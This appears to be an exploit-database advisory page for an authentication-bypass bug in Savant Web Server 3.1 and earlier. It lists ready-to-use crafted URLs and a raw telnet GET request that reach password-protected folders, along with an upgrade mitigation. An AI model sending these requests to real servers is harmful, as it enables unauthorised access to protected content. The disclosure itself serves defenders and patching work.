header-logo
Suggest Exploit
vendor:
Savant Web Server
by:
SecurityFocus
4.3
CVSS
MEDIUM
Input Validation Bug
20
CWE
Product Name: Savant Web Server
Affected Version From: 3.1 and below
Affected Version To: 3.1 and below
Patch Exists: YES
Related CWE: N/A
CPE: a:savant_web_server:savant_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Savant Webserver Input Validation Bug

Savant Webserver is vulnerable to an input validation bug, that could allow malicious users access to password protected folders. It should be noted that versions below 3.1 may also be vulnerable to this issue. An attacker can use the following requests to exploit this vulnerability: GET /password_folder / HTTP/1.0, http://host/password_folder%, http://host/password_folder%20

Mitigation:

Upgrade to the latest version of Savant Webserver
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5709/info

Savant Webserver is vulnerable to an input validation bug, that could allow malicious users access to password protected folders. 

It should be noted that versions below 3.1 may also be vulnerable to this issue.

http://host/password_folder.
"GET /password_folder / HTTP/1.0" <-- use with telnet
http://host/password_folder%2e
http://host/password_folder%20

Navigation

Suggest Exploit

Services By CQR